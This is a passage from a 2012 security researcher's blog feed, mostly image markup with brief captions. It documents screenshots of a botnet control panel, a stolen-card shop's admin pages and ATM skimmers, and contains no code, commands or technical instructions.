imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="267" src="http://3.bp.blogspot.com/-8niFf6Tgvws/T6mSyRLBgfI/AAAAAAAAGBw/QOimapOkGrE/s400/2.stats.png" width="400" /></a></div><br />Bots: <br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-jG0Go7DxRpI/T6mTBV4OWxI/AAAAAAAAGCI/4J2cTL-Ht_c/s1600/3.bots.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="http://2.bp.blogspot.com/-jG0Go7DxRpI/T6mTBV4OWxI/AAAAAAAAGCI/4J2cTL-Ht_c/s400/3.bots.png" width="400" /></a></div><br />Tasks:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-L4BPxwttSuo/T6mTFnUNO9I/AAAAAAAAGCQ/OgboM-9XXAQ/s1600/4.tasks.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="http://1.bp.blogspot.com/-L4BPxwttSuo/T6mTFnUNO9I/AAAAAAAAGCQ/OgboM-9XXAQ/s400/4.tasks.png" width="400" /></a></div><br />Logs: <br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-tg6G2KqYKM4/T6mS3Ir_hAI/AAAAAAAAGB4/XEn7YMYj-C8/s1600/5.logs.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="http://3.bp.blogspot.com/-tg6G2KqYKM4/T6mS3Ir_hAI/AAAAAAAAGB4/XEn7YMYj-C8/s400/5.logs.png" width="400" /></a></div><br />Upload: <br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-msaLwxx3GkE/T6mS8n1fh3I/AAAAAAAAGCA/yLIXz6SGCFU/s1600/6.upload.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="http://4.bp.blogspot.com/-msaLwxx3GkE/T6mS8n1fh3I/AAAAAAAAGCA/yLIXz6SGCFU/s400/6.upload.png" width="400" /></a></div><br />HC Stealer 2.0.1:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/--g6yvFUqQgY/T6mTuW3vPOI/AAAAAAAAGCY/fri9dOeUApQ/s1600/keylog.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="http://1.bp.blogspot.com/--g6yvFUqQgY/T6mTuW3vPOI/AAAAAAAAGCY/fri9dOeUApQ/s400/keylog.png" width="400" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-DNy7W7OewV4/T6mUM6340cI/AAAAAAAAGCg/nGOEVWDNBek/s1600/hc2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="http://4.bp.blogspot.com/-DNy7W7OewV4/T6mUM6340cI/AAAAAAAAGCg/nGOEVWDNBek/s400/hc2.png" width="400" /></a></div><br />Lame page:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-FPWsGcdMYKY/T6mUuBvxtZI/AAAAAAAAGCo/_zDIWWYKoMI/s1600/deface.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="http://3.bp.blogspot.com/-FPWsGcdMYKY/T6mUuBvxtZI/AAAAAAAAGCo/_zDIWWYKoMI/s400/deface.png" width="400" /></a></div><br /><br /><br /><br /><center><img border="0" src="http://1.bp.blogspot.com/-zzjdKep4p5w/T6muYBZ6WGI/AAAAAAAAGC0/0QH6hRoEFHw/s1600/1336489003460.jpg" /></center><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5365964245877416061-6071480593196412373?l=www.xylibox.com' alt='' /></div>http://www.xylibox.com/2012/05/aldibot.htmlnoreply@blogger.com (Steven K)0tag:blogger.com,1999:blog-5365964245877416061.post-303267842329856823Tue, 08 May 2012 08:53:00 +00002012-05-08T10:59:03.991+02:00Paypal shopMyFullzPaypalPPSurething TeamCredit CardsCCDigital StoreMyFullz.com (Credit Cards/Paypal shop)<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-b9hIMoQIuO4/T6ZdbkGVSOI/AAAAAAAAF6k/q-0MbJ8iJP8/s1600/06-05-2012+13-15-32.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="158" src="http://2.bp.blogspot.com/-b9hIMoQIuO4/T6ZdbkGVSOI/AAAAAAAAF6k/q-0MbJ8iJP8/s400/06-05-2012+13-15-32.png" width="400" /></a></div><br />Index:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-syWKaE9XDVY/T6ZY9q6OTGI/AAAAAAAAF4s/M-8dIzVqSe8/s1600/myfullz.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="http://1.bp.blogspot.com/-syWKaE9XDVY/T6ZY9q6OTGI/AAAAAAAAF4s/M-8dIzVqSe8/s400/myfullz.png" width="400" /></a></div><br />Admin Dashboard:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-ppm7EEB0hz0/T6ZZQR9NsEI/AAAAAAAAF40/EfjxjiEC97U/s1600/myfullz.com-dashboard.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="http://2.bp.blogspot.com/-ppm7EEB0hz0/T6ZZQR9NsEI/AAAAAAAAF40/EfjxjiEC97U/s400/myfullz.com-dashboard.png" width="400" /></a></div><br />Admin Settings:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-7JD08Vbgdrs/T6Zaucbm-HI/AAAAAAAAF48/zpq1Dfy4yas/s1600/myfullz.com-adminsettings.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="288" src="http://2.bp.blogspot.com/-7JD08Vbgdrs/T6Zaucbm-HI/AAAAAAAAF48/zpq1Dfy4yas/s400/myfullz.com-adminsettings.png" width="400" /></a></div><br />About us:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-EUY9SOyYeMs/T6Za9V4AaSI/AAAAAAAAF5E/qe2mZ2VONog/s1600/myfullz.com-about.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="http://1.bp.blogspot.com/-EUY9SOyYeMs/T6Za9V4AaSI/AAAAAAAAF5E/qe2mZ2VONog/s400/myfullz.com-about.png" width="400" /></a></div><br />Manage Categories:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-IfLENeuo_zI/T6ZbKYIx2VI/AAAAAAAAF5M/Kn4UBW7DHZo/s1600/myfullz.com-managecategory.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="http://1.bp.blogspot.com/-IfLENeuo_zI/T6ZbKYIx2VI/AAAAAAAAF5M/Kn4UBW7DHZo/s400/myfullz.com-managecategory.png" width="400" /></a></div><br />Manage Products: <br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-TqRSHfs5Xr0/T6ZbLYTuUJI/AAAAAAAAF5U/Annyeq9gf4Y/s1600/myfullz.com-manageproduct.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="271" src="http://4.bp.blogspot.com/-TqRSHfs5Xr0/T6ZbLYTuUJI/AAAAAAAAF5U/Annyeq9gf4Y/s400/myfullz.com-manageproduct.png" width="400" /></a></div><br />Add news:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-57ErShCGnHo/T6ZbY6-BzjI/AAAAAAAAF5c/N8Mrz83WEeo/s1600/myfullz.com-addnews.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="http://2.bp.blogspot.com/-57ErShCGnHo/T6ZbY6-BzjI/AAAAAAAAF5c/N8Mrz83WEeo/s400/myfullz.com-addnews.png" width="400" /></a></div><br />Add FAQ: <br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/--PKbq5ovanM/T6ZbZzZRAeI/AAAAAAAAF5k/tjemWBuTY7g/s1600/myfullz.com-faq.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="http://3.bp.blogspot.com/--PKbq5ovanM/T6ZbZzZRAeI/AAAAAAAAF5k/tjemWBuTY7g/s400/myfullz.com-faq.png" width="400" /></a></div><br />Send Email To All Buyers: <br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-jMDFd3fH3-c/T6Zba0K5WGI/AAAAAAAAF5s/QRHFOmYDdEQ/s1600/myfullz.com-sendmail.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="http://4.bp.blogspot.com/-jMDFd3fH3-c/T6Zba0K5WGI/AAAAAAAAF5s/QRHFOmYDdEQ/s400/myfullz.com-sendmail.png" width="400" /></a></div><br />Send a product manually: <br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-rzg1-gAc4I4/T6ZbcaSktrI/AAAAAAAAF50/6odU7dAnnCA/s1600/myfullz.com-sendprodyct.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="http://1.bp.blogspot.com/-rzg1-gAc4I4/T6ZbcaSktrI/AAAAAAAAF50/6odU7dAnnCA/s400/myfullz.com-sendprodyct.png" width="400" /></a></div><br />Add therms and conditions: <br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-qX_C3XIIJ9A/T6ZbdLM20DI/AAAAAAAAF58/9TsCpqfHmkU/s1600/myfullz.com-terms.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="http://1.bp.blogspot.com/-qX_C3XIIJ9A/T6ZbdLM20DI/AAAAAAAAF58/9TsCpqfHmkU/s400/myfullz.com-terms.png" width="400" /></a></div><br />Sales summary:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-0F-WGoV7UDg/T6Zb_NE2YPI/AAAAAAAAF6E/h2M6_-1yu_E/s1600/myfullz.com-sales.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="http://2.bp.blogspot.com/-0F-WGoV7UDg/T6Zb_NE2YPI/AAAAAAAAF6E/h2M6_-1yu_E/s400/myfullz.com-sales.png" width="400" /></a></div><br />Sales Details 1: <br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-LBgYfADhZl4/T6Zb_6ltIEI/AAAAAAAAF6M/vPMofwtVbhY/s1600/myfullz.com-sales2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="339" src="http://4.bp.blogspot.com/-LBgYfADhZl4/T6Zb_6ltIEI/AAAAAAAAF6M/vPMofwtVbhY/s400/myfullz.com-sales2.png" width="400" /></a></div><br />Sales Details 2: <br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-wWUq3qX-Dys/T6ZcA6qztgI/AAAAAAAAF6U/CKnJB-flCHU/s1600/myfullz.com-sales3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="338" src="http://3.bp.blogspot.com/-wWUq3qX-Dys/T6ZcA6qztgI/AAAAAAAAF6U/CKnJB-flCHU/s400/myfullz.com-sales3.png" width="400" /></a></div><br />Sales Details 3:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-9QhdURdDpTc/T6ZcB1F1CaI/AAAAAAAAF6Y/M9cuAalqVvw/s1600/myfullz.com-sales4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="http://1.bp.blogspot.com/-9QhdURdDpTc/T6ZcB1F1CaI/AAAAAAAAF6Y/M9cuAalqVvw/s400/myfullz.com-sales4.png" width="400" /></a></div><br /><br /><br />I'm not bad enought to share the user table, anyway enjoy this: <center><iframe allowfullscreen="" frameborder="0" height="315" src="http://www.youtube.com/embed/9Nqn9jJShFg" width="420"></iframe></center><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5365964245877416061-303267842329856823?l=www.xylibox.com' alt='' /></div>http://www.xylibox.com/2012/05/myfullzcom-credit-cardspaypal-shop.htmlnoreply@blogger.com (Steven K)1tag:blogger.com,1999:blog-5365964245877416061.post-6853064496730826228Sun, 06 May 2012 22:33:00 +00002012-05-07T00:33:36.639+02:00NCRSkimmerSkimmersATMCardingDieboldSkimmingTracking Cyber Crime: ATM skimmers (NCR/DIEBOLD)"DAB" adv:<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-bwnPfHIsO0c/T6buYm8a1OI/AAAAAAAAGAM/FaO87QylbCU/s1600/06-05-2012+23-32-43.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="170" src="http://3.bp.blogspot.com/-bwnPfHIsO0c/T6buYm8a1OI/AAAAAAAAGAM/FaO87QylbCU/s400/06-05-2012+23-32-43.png" width="400" /></a></div><br />ICQ: <br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-GyuwuFszjV8/T6bY5vMY4tI/AAAAAAAAF7E/ASH01IsnsF0/s1600/ATM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="http://3.bp.blogspot.com/-GyuwuFszjV8/T6bY5vMY4tI/AAAAAAAAF7E/ASH01IsnsF0/s400/ATM.png" width="269" /></a></div><br />NCR: (images blurred for obvious reason)<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-YGbnDLUnmac/T6bqPrZW8jI/AAAAAAAAF8I/2hkYISXg-K4/s1600/2012-05-04+05.54.42.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="http://1.bp.blogspot.com/-YGbnDLUnmac/T6bqPrZW8jI/AAAAAAAAF8I/2hkYISXg-K4/s400/2012-05-04+05.54.42.jpg" width="300" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-9xmcY5OFj_4/T6bqZWxq-kI/AAAAAAAAF8w/hAJRlueXcP4/s1600/2012-05-04+05.55.55.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="http://2.bp.blogspot.com/-9xmcY5OFj_4/T6bqZWxq-kI/AAAAAAAAF8w/hAJRlueXcP4/s400/2012-05-04+05.55.55.jpg" width="400" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-Atk3Y7aNXVs/T6bqXMSCloI/AAAAAAAAF8o/QUtx1Jm3XOw/s1600/2012-05-04+05.55.48.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="http://2.bp.blogspot.com/-Atk3Y7aNXVs/T6bqXMSCloI/AAAAAAAAF8o/QUtx1Jm3XOw/s400/2012-05-04+05.55.48.jpg" width="400" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-iyvFTIdl2kI/T6bqVKAj0QI/AAAAAAAAF8g/af8Ns7fQN9A/s1600/2012-05-04+05.55.21.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="http://4.bp.blogspot.com/-iyvFTIdl2kI/T6bqVKAj0QI/AAAAAAAAF8g/af8Ns7fQN9A/s400/2012-05-04+05.55.21.jpg" width="400" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-WLmErb76Pew/T6bqTLAPxbI/AAAAAAAAF8Y/K6t8qaSZYZw/s1600/2012-05-04+05.55.11.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="http://4.bp.blogspot.com/-WLmErb76Pew/T6bqTLAPxbI/AAAAAAAAF8Y/K6t8qaSZYZw/s320/2012-05-04+05.55.11.jpg" width="320" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-dzbVzy-EntI/T6bqRusOK8I/AAAAAAAAF8Q/1UULpARDAik/s1600/2012-05-04+05.54.53.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="http://4.bp.blogspot.com/-dzbVzy-EntI/T6bqRusOK8I/AAAAAAAAF8Q/1UULpARDAik/s400/2012-05-04+05.54.53.jpg" width="300" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-vdfWuNMetbY/T6bqbMrxaEI/AAAAAAAAF84/rDOgfnDQJp8/s1600/2012-05-04+05.56.23.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="http://1.bp.blogspot.com/-vdfWuNMetbY/T6bqbMrxaEI/AAAAAAAAF84/rDOgfnDQJp8/s400/2012-05-04+05.56.23.jpg" width="400" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-KNnvPT2I3mo/T6bqdNCJFKI/AAAAAAAAF9A/uQYgOQA2V9w/s1600/2012-05-04+05.56.39.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="http://1.bp.blogspot.com/-KNnvPT2I3mo/T6bqdNCJFKI/AAAAAAAAF9A/uQYgOQA2V9w/s400/2012-05-04+05.56.39.jpg" width="400" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-U3Fd0eB9R9Y/T6bqet0hnyI/AAAAAAAAF9I/4Fb3je7oYE0/s1600/2012-05-04+05.56.51.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="http://3.bp.blogspot.com/-U3Fd0eB9R9Y/T6bqet0hnyI/AAAAAAAAF9I/4Fb3je7oYE0/s400/2012-05-04+05.56.51.jpg" width="400" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-w1oJjskpcWo/T6bqgAdBiRI/AAAAAAAAF9Q/0YC-4_3H3tY/s1600/2012-05-04+05.57.22.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="http://2.bp.blogspot.com/-w1oJjskpcWo/T6bqgAdBiRI/AAAAAAAAF9Q/0YC-4_3H3tY/s400/2012-05-04+05.57.22.jpg" width="300" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-oPgWvdJGH2g/T6bqhpTsP2I/AAAAAAAAF9Y/-4aXHntLOG8/s1600/2012-05-04+05.57.39.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="http://3.bp.blogspot.com/-oPgWvdJGH2g/T6bqhpTsP2I/AAAAAAAAF9Y/-4aXHntLOG8/s400/2012-05-04+05.57.39.jpg" width="300" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-w1oJjskpcWo/T6bqgAdBiRI/AAAAAAAAF9Q/0YC-4_3H3tY/s1600/2012-05-04+05.57.22.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="http://2.bp.blogspot.com/-w1oJjskpcWo/T6bqgAdBiRI/AAAAAAAAF9Q/0YC-4_3H3tY/s400/2012-05-04+05.57.22.jpg" width="300" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-U3Fd0eB9R9Y/T6bqet0hnyI/AAAAAAAAF9I/4Fb3je7oYE0/s1600/2012-05-04+05.56.51.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="http://3.bp.blogspot.com/-U3Fd0eB9R9Y/T6bqet0hnyI/AAAAAAAAF9I/4Fb3je7oYE0/s400/2012-05-04+05.56.51.jpg" width="400" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-KNnvPT2I3mo/T6bqdNCJFKI/AAAAAAAAF9A/uQYgOQA2V9w/s1600/2012-05-04+05.56.39.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="http://1.bp.blogspot.com/-KNnvPT2I3mo/T6bqdNCJFKI/AAAAAAAAF9A/uQYgOQA2V9w/s400/2012-05-04+05.56.39.jpg" width="400" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-vdfWuNMetbY/T6bqbMrxaEI/AAAAAAAAF84/rDOgfnDQJp8/s1600/2012-05-04+05.56.23.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="http://1.bp.blogspot.com/-vdfWuNMetbY/T6bqbMrxaEI/AAAAAAAAF84/rDOgfnDQJp8/s400/2012-05-04+05.56.23.jpg" width="400" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-v_aJgSLmT3Q/T6bqkylKvgI/AAAAAAAAF9o/EiQyP6k72Rk/s1600/2012-05-04+05.58.02.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="http://3.bp.blogspot.com/-v_aJgSLmT3Q/T6bqkylKvgI/AAAAAAAAF9o/EiQyP6k72Rk/s400/2012-05-04+05.58.02.jpg" width="300" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-9NCcFM_Ae0Y/T6bqnEBzHpI/AAAAAAAAF9w/KUAnbunTnsY/s1600/2012-05-04+05.58.17.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="http://4.bp.blogspot.com/-9NCcFM_Ae0Y/T6bqnEBzHpI/AAAAAAAAF9w/KUAnbunTnsY/s400/2012-05-04+05.58.17.jpg" width="400" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-pseiAlZeIRc/T6bqo7Ed7ZI/AAAAAAAAF94/55X38Mihhkc/s1600/2012-05-04+05.58.35.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="http://3.bp.blogspot.com/-pseiAlZeIRc/T6bqo7Ed7ZI/AAAAAAAAF94/55X38Mihhkc/s400/2012-05-04+05.58.35.jpg" width="400" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-m0JM0kNOHgc/T6bqqRaQaTI/AAAAAAAAF-A/eXm-doOnPNk/s1600/2012-05-04+05.59.15.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="http://2.bp.blogspot.com/-m0JM0kNOHgc/T6bqqRaQaTI/AAAAAAAAF-A/eXm-doOnPNk/s400/2012-05-04+05.59.15.jpg" width="400" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-UHthJb7ix1s/T6bqjWQjFoI/AAAAAAAAF9g/Nj5J93UEf0Y/s1600/2012-05-04+05.57.54.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="http://2.bp.blogspot.com/-UHthJb7ix1s/T6bqjWQjFoI/AAAAAAAAF9g/Nj5J93UEf0Y/s400/2012-05-04+05.57.54.jpg" width="300" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-O6EhgCRvlxU/T6bqs9HfGbI/AAAAAAAAF-I/pNRvmGTmzVI/s1600/2012-05-04+05.59.26.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="http://3.bp.blogspot.com/-O6EhgCRvlxU/T6bqs9HfGbI/AAAAAAAAF-I/pNRvmGTmzVI/s400/2012-05-04+05.59.26.jpg" width="400" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-6BZ6lG-SaBM/T6bqvJT_a2I/AAAAAAAAF-Q/ss-682oekG4/s1600/2012-05-04+05.59.42.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="http://2.bp.blogspot.com/-6BZ6lG-SaBM/T6bqvJT_a2I/AAAAAAAAF-Q/ss-682oekG4/s400/2012-05-04+05.59.42.jpg" width="400" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-NXGwIWj2fSM/T6bqxXYDKOI/AAAAAAAAF-Y/uiiLjjgZ8DA/s1600/2012-05-04+06.00.15.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="http://2.bp.blogspot.com/-NXGwIWj2fSM/T6bqxXYDKOI/AAAAAAAAF-Y/uiiLjjgZ8DA/s400/2012-05-04+06.00.15.jpg" width="400" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-acjPMy2C5Gk/T6bqzVDUqvI/AAAAAAAAF-g/F3wztiQpzq4/s1600/2012-05-04+06.00.24.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="http://4.bp.blogspot.com/-acjPMy2C5Gk/T6bqzVDUqvI/AAAAAAAAF-g/F3wztiQpzq4/s400/2012-05-04+06.00.24.jpg" width="400" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-P6y08M_cWI0/T6bq6WmlRVI/AAAAAAAAF-8/Kw300YTZmrg/s1600/2012-05-04+06.01.26.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="http://4.bp.blogspot.com/-P6y08M_cWI0/T6bq6WmlRVI/AAAAAAAAF-8/Kw300YTZmrg/s400/2012-05-04+06.01.26.jpg" width="400" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-0IIXmg4ulYs/T6bq44A5rGI/AAAAAAAAF-4/atnvxhz68H4/s1600/2012-05-04+06.01.18.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="http://2.bp.blogspot.com/-0IIXmg4ulYs/T6bq44A5rGI/AAAAAAAAF-4/atnvxhz68H4/s400/2012-05-04+06.01.18.jpg" width="400" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/--HFa73GSV44/T6bq21OQ23I/AAAAAAAAF-w/7KvT9-uBsEE/s1600/2012-05-04+06.01.09.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="http://3.bp.blogspot.com/--HFa73GSV44/T6bq21OQ23I/AAAAAAAAF-w/7KvT9-uBsEE/s400/2012-05-04+06.01.09.jpg" width="400" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-aiz2cFwU2j0/T6bq1DJosSI/AAAAAAAAF-o/NaZ67mw8q9A/s1600/2012-05-04+06.00.54.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="http://1.bp.blogspot.com/-aiz2cFwU2j0/T6bq1DJosSI/AAAAAAAAF-o/NaZ67mw8q9A/s400/2012-05-04+06.00.54.jpg" width="400" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-9lmnGWYpO9M/T6bq78IDrwI/AAAAAAAAF_E/mDG5tGJDJaw/s1600/2012-05-04+06.01.36.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="http://1.bp.blogspot.com/-9lmnGWYpO9M/T6bq78IDrwI/AAAAAAAAF_E/mDG5tGJDJaw/s400/2012-05-04+06.01.36.jpg" width="400" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-OlEVZDdF0zg/T6bq9nF7SGI/AAAAAAAAF_Q/AQyEtRON1Ho/s1600/2012-05-04+06.02.01.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="http://2.bp.blogspot.com/-OlEVZDdF0zg/T6bq9nF7SGI/AAAAAAAAF_Q/AQyEtRON1Ho/s400/2012-05-04+06.02.01.jpg" width="400" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-OKd3wApWQS8/T6bq_BmM8GI/AAAAAAAAF_Y/TBqahFyX0Rk/s1600/2012-05-04+06.02.12.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="http://1.bp.blogspot.com/-OKd3wApWQS8/T6bq_BmM8GI/AAAAAAAAF_Y/TBqahFyX0Rk/s400/2012-05-04+06.02.12.jpg" width="400" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-JCCBBYH-TGo/T6brAsyF49I/AAAAAAAAF_g/w-5HM4dLbuQ/s1600/2012-05-04+06.02.27.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="http://3.bp.blogspot.com/-JCCBBYH-TGo/T6brAsyF49I/AAAAAAAAF_g/w-5HM4dLbuQ/s400/2012-05-04+06.02.27.jpg" width="400" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-s_GVMHvZXeM/T6brCNRkeVI/AAAAAAAAF_o/MIMwrsH9hoQ/s1600/2012-05-04+06.02.41.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="http://3.bp.blogspot.com/-s_GVMHvZXeM/T6brCNRkeVI/AAAAAAAAF_o/MIMwrsH9hoQ/s400/2012-05-04+06.02.41.jpg" width="400" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a 